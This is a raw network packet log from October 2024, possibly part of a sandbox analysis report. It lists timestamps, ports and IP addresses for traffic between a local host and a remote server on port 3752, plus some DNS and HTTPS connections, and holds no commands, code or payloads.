Oct 8, 2024 20:52:44.605607986 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:44.610850096 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:44.976334095 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:44.976382017 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:44.976452112 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:44.976494074 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:44.976542950 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:44.981314898 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:44.981415033 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:49.976217985 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:49.981564045 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:49.981753111 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:49.981754065 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:49.984601974 CEST	55198	53	192.168.2.8	162.159.36.2
Oct 8, 2024 20:52:49.987030983 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:49.990689039 CEST	53	55198	162.159.36.2	192.168.2.8
Oct 8, 2024 20:52:49.990770102 CEST	55198	53	192.168.2.8	162.159.36.2
Oct 8, 2024 20:52:49.995824099 CEST	53	55198	162.159.36.2	192.168.2.8
Oct 8, 2024 20:52:50.469310045 CEST	55198	53	192.168.2.8	162.159.36.2
Oct 8, 2024 20:52:50.474694967 CEST	53	55198	162.159.36.2	192.168.2.8
Oct 8, 2024 20:52:50.474759102 CEST	55198	53	192.168.2.8	162.159.36.2
Oct 8, 2024 20:52:50.614012003 CEST	55200	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:50.614044905 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:50.614121914 CEST	55200	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:50.614500046 CEST	55200	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:50.614512920 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:50.664946079 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:50.664958000 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:50.665079117 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:50.673346043 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:50.679435968 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:50.871948957 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:50.872256994 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:50.877403021 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.065264940 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.068079948 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.073298931 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.073373079 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.078298092 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.311425924 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.311527967 CEST	55200	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:51.314412117 CEST	55200	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:51.314419031 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.314677954 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.318255901 CEST	55200	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:51.363399029 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.472973108 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.475702047 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.481383085 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.481460094 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.487497091 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.578572035 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.578598022 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.578613043 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.578710079 CEST	55200	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:51.578727961 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.580408096 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.580456018 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.580554962 CEST	55200	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:51.580564022 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.580614090 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.581418991 CEST	55200	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:51.581521034 CEST	55200	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:51.581528902 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.581542015 CEST	55200	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:51.581547022 CEST	443	55200	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:51.831423998 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.831439018 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.831509113 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.831512928 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.831527948 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.831546068 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.831612110 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.831628084 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.831739902 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.831964016 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.831975937 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.832015991 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.834109068 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.834155083 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.834172010 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.834244967 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.836199999 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.836303949 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.836337090 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.836353064 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.836412907 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.836838961 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.836886883 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.836900949 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.837009907 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.839766026 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.839808941 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.839854002 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.881418943 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.919198036 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.919223070 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.919403076 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.957904100 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.958091974 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.958106041 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.958250999 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.961294889 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.961309910 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.961324930 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.961347103 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.961383104 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:51.963685989 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.963779926 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.963793993 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:51.963886023 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.079988003 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.080046892 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.080061913 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.080108881 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.080204964 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.080225945 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.080280066 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.080493927 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.080508947 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.080543995 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.080688953 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.080703020 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.080718040 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.080738068 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.080765963 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.081382990 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.081407070 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.081420898 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.081471920 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.081727028 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.081751108 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.081772089 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.082377911 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.082427025 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.082442045 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.082458019 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.082473993 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.082504034 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.082791090 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.082839012 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.083302975 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.083368063 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.083389044 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.083415031 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.083535910 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.083549976 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.083584070 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.084212065 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.084253073 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.084258080 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.084266901 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.084281921 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.084310055 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.084471941 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.084518909 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.085153103 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.085230112 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.085244894 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.085290909 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.085371971 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.085386992 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.085422993 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.167035103 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167078018 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167090893 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167275906 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167288065 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167300940 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167571068 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.167644978 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167658091 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167670012 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167733908 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167792082 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.167831898 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167943954 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167954922 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.167967081 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.168003082 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.168040991 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.168186903 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.168199062 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.168211937 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.168221951 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.168231964 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.168278933 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.168533087 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.168620110 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.168632984 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.168646097 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.168664932 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.168704033 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.169199944 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.169214010 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.169226885 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.169239998 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.169250965 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.169259071 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.169344902 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.171690941 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.171741962 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.171787024 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.171799898 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.171968937 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.175568104 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.175715923 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.175729036 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.175769091 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.177900076 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.177913904 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.177927017 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.177953005 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.177993059 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.180733919 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.180747032 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.180758953 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.180788994 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.183418036 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.183484077 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.183722019 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.183733940 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.183864117 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.186480999 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.186495066 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.186506987 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.186538935 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.190079927 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.190105915 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.190118074 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.190139055 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.190187931 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.193439007 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.193459988 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.193470001 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.193625927 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.195873022 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.195936918 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.196104050 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.196119070 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.196209908 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.199151039 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.199234009 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.199244976 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.199255943 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.199294090 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.199333906 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.202011108 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.202358961 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.202440023 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.214390993 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.214721918 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.214731932 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.214776993 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.254574060 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.254585028 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.254596949 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.254688978 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.254801989 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.254880905 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.254894018 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.254905939 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.254920959 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.254931927 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.255122900 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.255135059 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.255146980 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.255161047 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.255317926 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.255317926 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.255490065 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.255768061 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.255816936 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.255841970 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.255852938 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.255923986 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.260555029 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.260565996 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.260584116 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.260596037 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.260608912 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.260616064 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.260698080 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.261578083 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.261589050 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.261601925 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.261632919 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.261704922 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.261953115 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.261962891 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.261975050 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.261987925 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.262001991 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.262037992 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.262469053 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.262480021 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.262490988 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.262514114 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.262554884 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.262567997 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.262578011 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.262603045 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.262667894 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.263402939 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.263559103 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.263570070 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.263581991 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.263593912 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.263601065 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.263605118 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.263705015 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.265662909 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.265674114 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.265691996 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.265763998 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.267014027 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.267064095 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.267076015 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.267890930 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.269568920 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.269588947 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.269599915 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.269663095 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.270714045 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.270725012 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.270735025 CEST	3752	49718	147.45.126.71	192.168.2.8
